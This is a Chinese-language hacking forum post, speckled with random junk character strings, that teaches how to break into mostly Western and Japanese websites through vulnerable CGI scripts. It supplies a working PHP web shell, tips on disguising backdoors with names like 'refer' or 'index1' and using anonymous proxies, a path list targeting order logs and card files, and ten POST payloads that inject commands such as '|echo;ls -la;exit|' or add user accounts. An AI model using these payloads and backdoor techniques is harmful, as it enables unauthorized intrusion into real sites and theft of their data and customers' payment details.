CGI 脚本入侵快速上手+脚本使用方法

admin

CGI 脚本入侵快速上手+脚本使用方法
大家好 我是bboyhip  只是一名菜菜的exploiter
很开心来到贵论坛
  F8 u2 r! U2 m) z9 ^( F这里让我感觉 很有技术交流的感觉
* g8 D* n" T9 l我会长长来玩的
前言:
3 {1 N8 z7 r) a+ e以下讲解针对欧美日本网站
4 R) P# I# \& f& j1 |. l- G' `當我們在做滲透分析的時候 方法有很多
我门都知道 国外伺服器大多是linux 平台
所以有很多网站程序有6成都会使用cgi 脚本来管理
目录为/cgi-bin/
+ @) L6 b* o, g/ f5 `6 {
+ p) U% I* _/ ~" y9 W只是个人在实务上一些经验
! o  M  ?1 b. g) A写的不好 请多多见谅喔
在这里我简单分为几个部份一定要會的
讲解一下
让没有基础的人很容易上手
- K0 {1 K8 \, V0 w
以下内容跟帖回复才能看到
==============================
/ c! P8 ^* e6 G- X4 W
3 ^' r/ x: Y; K7 F5 t$ L第1部份: 何谓Shell?
. X. Y" |0 q7 J$ K+ |9 WShell的中文, 可称为 "壳".  Shell 是一个比较复杂的概念, 先看比较传统的解释:
( @4 T7 \5 B$ X3 V/ W* a6 ~A shell is the program which reads user input from the command line and executes actions based upon that input.
意思是, 通过应用程式(shell), 用户输入指令, 由系统执行该指令.
3 n' V! m1 i- ?4 _% o, V4 T6 W! G
! A) ?# {. ?7 ^( |7 G+ i# G对於黑客来说, shell是後门, 是入侵/ 控制/ 浏览对方系统的程式/ 方法.  
) R3 g; q; V4 @3 |( R要自行建立一个shell是十分困难的, 因为要先找漏洞, 找到後, 利用该漏洞来写入档案/ 後门.  大家都知道, 有些漏洞只可加码, 有些可读档, 但可以写档的不多.  在数年前, 有一个十分流行及易用的漏洞addpasswd.cgi, 可以写後门, 但时至今日, 绝大部份的addpasswd.cgi已经被删除.
所以, 对於入门的exploiter来说, 先收集别人的後门, 多多练习, 然後再学习做自己的shell.

. l+ I6 d! P8 T$ t% f' H# I6 K- F0 S第2部份: Unix 指令
2 j" A3 i, V! P$ d) E4 P以下是一些常见及重要的指令:
; q6 H3 [" U7 O. Gpwd: 显示当前目录, 即是後门/程式所在的位置
* J& \9 G' j3 i9 N$ Q. J如 /home/www/site.com/cgi-bin/
: ?2 t, i8 _! jls: 列出档案 (-a 包含隐藏档; -l 包含详细资料).  
ls -al :详细列出档案资料(当前目录)
7 Z+ H: Q* o8 F6 q/ E% jls /: 列出根目录
0 n) n0 e9 R' G+ A' L, R6 K1 _, S9 W1 ^& lls /etc: 列出/etc的资料夹及档案
ls ../ -al: 详细列出上一层的资料夹及档案
cat: 显示档案内容
cat .htpasswd: 显示 .htpasswd 这个档案的内容(当前目录)
3 J- i5 g! D! ]2 y2 Q- Hcat /etc/passwd: 显示 /etc/passwd 这个档案的内容
who: 显示谁login 至系统
  {6 f- H  ^1 P4 U3 h% W& Nman: 显示指令用法  
man ls: 显示ls这指令的用法  
1 K/ v  T3 D/ emkdir 建立目录
rmdir 删除目录
mv 移动档案
rm 删除档案
! y  x: R, Q6 k( w. E: ~
第3部份: Shell的使用
例如:
http://site.com/refer.php
这是我的後门, 原代码如下:
* X. U! A" E0 |4 Q  y<Form Action="#" Method="POST">
9 G( m+ g3 r' ?' p<Input type="text" name="cmd">
  K- n% X5 q: {/ r5 |3 N  x/ J<Input type="Submit">
# I1 @- o0 L7 n7 n6 \. o- E( m1 I</Form>
<?php
  B: i6 A1 U# B# j% A7 T$cmd = $_POST['cmd'];
5 \$ Y* x  Z' y5 G. @' k$Output = shell_exec($cmd);
. k; s; C# i% V  o& ?0 decho $Output;
?>
8 F8 S4 w6 E  p5 O4 O输入pwd, 可得到绝对路径:
/home/htdocs/users/jnesbitt/jnesbitt/nylonfantasies.com

. f% o8 |  s1 [2 }! K9 X6 n/ y$ t6 C第4部份: 注意事项
5 c3 C/ I, O8 j* B9 x- 使用匿名代理, 保障自己
# ?; w* U9 a" N' [2 h: j/ L- 不可恶意破坏, 或更改现有档案, 否则管理员发现了, 不但会删除後门, 可能会有追究行动
- 加後门前, 必须了解目标系统是否支援.  例如, cgi後门, 应放在cgi-bin; 有些系统可能不支援 php後门等.
- ?8 }7 h  l2 l& `; ^# u- 加後门前 (如 index.php), 先检查是否已存在该档案名称, 以免覆盖原有档案, 造成破坏.
- 後门的名称, 不可使用hack, crack, exploit等字眼, 最好使用index, index1, log, login, refer, tmp, test, info等, 鱼目混珠,
2 ]* a% D/ q5 E- k/ L不容易被发现.
2 C/ R( c, G0 m& I- 将後门放在比较隐闭的地方 (例如 /cgi-bin/内, 有很多cgi档案, 比较少php档案)
针对网站的渗透分析方法太多了
8 E1 Q' H$ B* {) ]这篇文章的重点是cgi 脚本攻击
所以我用简单的叙述形容
开始讲解脚本入侵过程:
; p6 c$ z! X6 p+ ?; E; {# i在这里提供一些方法思路让大家学习一下

) A7 n! y4 U! F3 d9 d1.一开始对一个网站进行cgi漏洞扫描
我们需要的东西有
0 @0 ]6 ~8 e: E5 p. T2 }扫洞工具 如:triton..等等
. {: |9 ?& y7 FE表
  ?; e; w4 |# P如
: y+ n1 |1 y( a$ R  G8 Y; ?/cgi-bin/add-passwd.cgi
( D5 m* S4 _6 G# U3 H( J: q/WebShop/templates/cc.txt
- F7 }0 O- ^7 ?/Admin_files/order.log
$ C& N& b% l) f) c! \( Z3 q/ s6 y/orders/mountain.cfg
/cgi-sys/cart.pl
/scripts/cart.pl
/htbin/cart.pl
E表来源可以是网路收寻或是自己的0 day

. n& Y0 O$ h6 s- h& r- ]8 s6 W2.怎样确认扫到的洞 是真的还假的?
举例: target: http://www.site.com/cgi-bin/add-passwd.cgi
+ d5 }. Y! N1 |# \: C) {# x一般都是在IE里先看一下的,记住这个返回码哦
5 O: ]* W" P5 sERROR:This script should be referenced with a METHOD of POST.
没有返回一定是假的
3.重来来了 很多人都会问我
他扫到很多洞 但是不会使用
2 g4 J5 }  J' R/ }' w, }$ K因为这些漏洞 使用的语法 称为post
我们要找post 的方法很多
4 B& z; K  m8 z1 }% H# w+ {可以是源代码分析 找出介质
; b1 n, B) w4 q: n( s* s4 c& y, D! o或是用抓包工具 抓他的语法...等等
" T* V; {! m4 H6 C2 C( x. y7 r
以下我提供10个 cgi 洞以及使用方法post
让大家可以针对网站去做扫描  
/index.cgi
wei=ren&gen=command
# F# ?. A3 q" I6 O8 h/ i/passmaster.cgi
9 {& R. h5 U8 h) F5 G  x; tAction=Add&Username=Username&Password=Password
" e4 J) z* k6 [0 s! i# t/accountcreate.cgi
username=username&password=password&ref1=|echo;ls|
) S/ s3 X5 P8 J/form.cgi
  H! Z1 D+ a* ^8 Xname=xxxx&email=email&subject=xxxx&response=|echo;ls|
/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
. f+ |3 ~1 h3 R9 M! euser=username&pass=Password&confirm=Password
+ ?0 ?- a4 p. Y4 `' ~2 A/ccbill-local.asp
post_values=username:password
$ r4 X- R7 `4 W8 Y/count.cgi
pinfile=|echo;ls -la;exit|
- `+ e  j- y* S, s0 z3 T, E/ D7 ^1 q/recon.cgi
8 V3 c4 ~3 }. @4 ~/ u. K* o( y/recon.cgi?search
( `0 L5 ]: b8 m2 G: dsearchoption=1&searchfor=|echo;ls -al;exit|
/verotelrum.pl
. E, H) U. I, i- }/ K+ x9 G5 y& _vercode=username:password:dseegsow:add:amount<&30>
. Q. g! w8 [+ C/ u6 H7 v0 @! |& w/af.cgi_browser_out=|echo;ls -la;exit;|

) I+ X/ u7 o/ W今天就讲到这  感谢大家支持